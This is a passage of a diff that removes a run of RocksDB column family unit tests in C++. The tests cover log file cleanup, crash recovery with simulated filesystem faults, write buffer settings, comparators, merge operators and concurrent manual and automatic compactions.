-  PutRandomData(2, 1000, 100);
-  WaitForFlush(2);
-  // [(1), (2), 3] [(1), (0)] [(0)] [0, (1)] [1, (2)], [2]
-  AssertCountLiveLogFiles(6);
-  PutRandomData(3, 1000, 100);
-  WaitForFlush(3);
-  // [(1), (2), (3)] [(1), (0)] [(0)] [0, (1)] [1, (2)], [2, (3)] [3]
-  // delete obsolete logs -->
-  // [0, (1)] [1, (2)], [2, (3)] [3]
-  AssertCountLiveLogFiles(4);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, CrashAfterFlush) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_env(
-      new FaultInjectionTestEnv(env_));
-  db_options_.env = fault_env.get();
-  Open();
-  CreateColumnFamilies({"one"});
-
-  WriteBatch batch;
-  batch.Put(handles_[0], Slice("foo"), Slice("bar"));
-  batch.Put(handles_[1], Slice("foo"), Slice("bar"));
-  ASSERT_OK(db_->Write(WriteOptions(), &batch));
-  Flush(0);
-  fault_env->SetFilesystemActive(false);
-
-  std::vector<std::string> names;
-  for (auto name : names_) {
-    if (name != "") {
-      names.push_back(name);
-    }
-  }
-  Close();
-  fault_env->DropUnsyncedFileData();
-  fault_env->ResetState();
-  Open(names, {});
-
-  // Write batch should be atomic.
-  ASSERT_EQ(Get(0, "foo"), Get(1, "foo"));
-
-  Close();
-  db_options_.env = env_;
-}
-
-TEST_F(ColumnFamilyTest, OpenNonexistentColumnFamily) {
-  ASSERT_OK(TryOpen({"default"}));
-  Close();
-  ASSERT_TRUE(TryOpen({"default", "dne"}).IsInvalidArgument());
-}
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-// Makes sure that obsolete log files get deleted
-TEST_F(ColumnFamilyTest, DifferentWriteBufferSizes) {
-  // disable flushing stale column families
-  db_options_.max_total_wal_size = std::numeric_limits<uint64_t>::max();
-  Open();
-  CreateColumnFamilies({"one", "two", "three"});
-  ColumnFamilyOptions default_cf, one, two, three;
-  // setup options. all column families have max_write_buffer_number setup to 10
-  // "default" -> 100KB memtable, start flushing immediatelly
-  // "one" -> 200KB memtable, start flushing with two immutable memtables
-  // "two" -> 1MB memtable, start flushing with three immutable memtables
-  // "three" -> 90KB memtable, start flushing with four immutable memtables
-  default_cf.write_buffer_size = 100000;
-  default_cf.arena_block_size = 4 * 4096;
-  default_cf.max_write_buffer_number = 10;
-  default_cf.min_write_buffer_number_to_merge = 1;
-  default_cf.max_write_buffer_number_to_maintain = 0;
-  one.write_buffer_size = 200000;
-  one.arena_block_size = 4 * 4096;
-  one.max_write_buffer_number = 10;
-  one.min_write_buffer_number_to_merge = 2;
-  one.max_write_buffer_number_to_maintain = 1;
-  two.write_buffer_size = 1000000;
-  two.arena_block_size = 4 * 4096;
-  two.max_write_buffer_number = 10;
-  two.min_write_buffer_number_to_merge = 3;
-  two.max_write_buffer_number_to_maintain = 2;
-  three.write_buffer_size = 4096 * 22;
-  three.arena_block_size = 4096;
-  three.max_write_buffer_number = 10;
-  three.min_write_buffer_number_to_merge = 4;
-  three.max_write_buffer_number_to_maintain = -1;
-
-  Reopen({default_cf, one, two, three});
-
-  int micros_wait_for_flush = 10000;
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(1);
-  PutRandomData(1, 200, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 0});
-  AssertCountLiveLogFiles(2);
-  PutRandomData(2, 1000, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 1, 0});
-  AssertCountLiveLogFiles(3);
-  PutRandomData(2, 1000, 1000);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 0});
-  AssertCountLiveLogFiles(4);
-  PutRandomData(3, 93, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 1});
-  AssertCountLiveLogFiles(5);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 2});
-  AssertCountLiveLogFiles(6);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 3});
-  AssertCountLiveLogFiles(7);
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 1, 2, 3});
-  AssertCountLiveLogFiles(8);
-  PutRandomData(2, 100, 10000);
-  WaitForFlush(2);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 3});
-  AssertCountLiveLogFiles(9);
-  PutRandomData(3, 88, 990);
-  WaitForFlush(3);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 0});
-  AssertCountLiveLogFiles(10);
-  PutRandomData(3, 88, 990);
-  env_->SleepForMicroseconds(micros_wait_for_flush);
-  AssertNumberOfImmutableMemtables({0, 1, 0, 1});
-  AssertCountLiveLogFiles(11);
-  PutRandomData(1, 200, 1000);
-  WaitForFlush(1);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 1});
-  AssertCountLiveLogFiles(5);
-  PutRandomData(3, 88 * 3, 990);
-  WaitForFlush(3);
-  PutRandomData(3, 88 * 4, 990);
-  WaitForFlush(3);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(0, 100, 1000);
-  WaitForFlush(0);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(2, 3 * 1000, 1000);
-  WaitForFlush(2);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(12);
-  PutRandomData(1, 2*200, 1000);
-  WaitForFlush(1);
-  AssertNumberOfImmutableMemtables({0, 0, 0, 0});
-  AssertCountLiveLogFiles(7);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // Cuckoo is not supported in lite
-TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) {
-  db_options_.allow_concurrent_memtable_write = false;
-  Open();
-  auto* s1 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s1 != nullptr);
-  dbfull()->ReleaseSnapshot(s1);
-
-  // Add a column family that doesn't support snapshot
-  ColumnFamilyOptions first;
-  first.memtable_factory.reset(NewHashCuckooRepFactory(1024 * 1024));
-  CreateColumnFamilies({"first"}, {first});
-  auto* s2 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s2 == nullptr);
-
-  // Add a column family that supports snapshot. Snapshot stays not supported.
-  ColumnFamilyOptions second;
-  CreateColumnFamilies({"second"}, {second});
-  auto* s3 = dbfull()->GetSnapshot();
-  ASSERT_TRUE(s3 == nullptr);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-class TestComparator : public Comparator {
-  int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override {
-    return 0;
-  }
-  const char* Name() const override { return "Test"; }
-  void FindShortestSeparator(std::string* start,
-                             const rocksdb::Slice& limit) const override {}
-  void FindShortSuccessor(std::string* key) const override {}
-};
-
-static TestComparator third_comparator;
-static TestComparator fourth_comparator;
-
-// Test that we can retrieve the comparator from a created CF
-TEST_F(ColumnFamilyTest, GetComparator) {
-  Open();
-  // Add a column family with no comparator specified
-  CreateColumnFamilies({"first"});
-  const Comparator* comp = handles_[0]->GetComparator();
-  ASSERT_EQ(comp, BytewiseComparator());
-
-  // Add three column families - one with no comparator and two
-  // with comparators specified
-  ColumnFamilyOptions second, third, fourth;
-  second.comparator = &third_comparator;
-  third.comparator = &fourth_comparator;
-  CreateColumnFamilies({"second", "third", "fourth"}, {second, third, fourth});
-  ASSERT_EQ(handles_[1]->GetComparator(), BytewiseComparator());
-  ASSERT_EQ(handles_[2]->GetComparator(), &third_comparator);
-  ASSERT_EQ(handles_[3]->GetComparator(), &fourth_comparator);
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, DifferentMergeOperators) {
-  Open();
-  CreateColumnFamilies({"first", "second"});
-  ColumnFamilyOptions default_cf, first, second;
-  first.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  second.merge_operator = MergeOperators::CreateStringAppendOperator();
-  Reopen({default_cf, first, second});
-
-  std::string one, two, three;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-
-  ASSERT_OK(Put(0, "foo", two));
-  ASSERT_OK(Put(0, "foo", one));
-  ASSERT_TRUE(Merge(0, "foo", two).IsNotSupported());
-  ASSERT_EQ(Get(0, "foo"), one);
-
-  ASSERT_OK(Put(1, "foo", two));
-  ASSERT_OK(Put(1, "foo", one));
-  ASSERT_OK(Merge(1, "foo", two));
-  ASSERT_EQ(Get(1, "foo"), three);
-
-  ASSERT_OK(Put(2, "foo", two));
-  ASSERT_OK(Put(2, "foo", one));
-  ASSERT_OK(Merge(2, "foo", two));
-  ASSERT_EQ(Get(2, "foo"), one + "," + two);
-  Close();
-}
-
-#ifndef ROCKSDB_LITE  // WaitForFlush() is not supported
-TEST_F(ColumnFamilyTest, DifferentCompactionStyles) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = static_cast<uint64_t>(1) << 60;
-
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 1; ++i) {
-    PutRandomData(1, 10, 12000);
-    PutRandomData(1, 1, 10);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 1; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-
-  // TRIGGER compaction "one"
-  PutRandomData(1, 10, 12000);
-  PutRandomData(1, 1, 10);
-
-  // TRIGGER compaction "two"
-  PutRandomData(2, 10, 12000);
-  PutRandomData(2, 1, 10);
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE
-// Sync points not supported in RocksDB Lite
-
-TEST_F(ColumnFamilyTest, MultipleManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::MultiManual:4", "ColumnFamilyTest::MultiManual:1"},
-       {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"},
-       {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:3");
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  std::vector<port::Thread> threads;
-  threads.emplace_back([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  threads.emplace_back([&] {
-    TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:1");
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[2], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:2");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:5");
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  bool cf_1_1 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:1"},
-       {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"},
-       {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:3");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:1");
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[2], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:2");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:5");
-  threads.join();
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  two.compaction_style = kCompactionStyleLevel;
-  two.num_levels = 4;
-  two.level0_file_num_compaction_trigger = 3;
-  two.write_buffer_size = 100000;
-
-  Reopen({default_cf, one, two});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:1"},
-       {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  // SETUP column family "two" -- level style with 4 levels
-  for (int i = 0; i < two.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(2, 10, 12000);
-    PutRandomData(2, 1, 10);
-    WaitForFlush(2);
-    AssertFilesPerLevel(ToString(i + 1), 2);
-  }
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-  threads.join();
-
-  // WAIT for compactions
-  WaitForCompaction();
-
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-
-  // VERIFY compaction "two"
-  AssertFilesPerLevel("0,1", 2);
-  CompactAll(2);
-  AssertFilesPerLevel("0,1", 2);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualManual:4", "ColumnFamilyTest::ManualManual:2"},
-       {"ColumnFamilyTest::ManualManual:4", "ColumnFamilyTest::ManualManual:5"},
-       {"ColumnFamilyTest::ManualManual:1", "ColumnFamilyTest::ManualManual:2"},
-       {"ColumnFamilyTest::ManualManual:1",
-        "ColumnFamilyTest::ManualManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = true;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:5");
-
-  WaitForFlush(1);
-
-  // Add more L0 files and force another manual compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  rocksdb::port::Thread threads1([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:1");
-
-  threads.join();
-  threads1.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 2);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:4", "ColumnFamilyTest::ManualAuto:5"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"},
-       {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:5");
-
-  WaitForFlush(1);
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 2);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleLevel;
-
-  one.num_levels = 1;
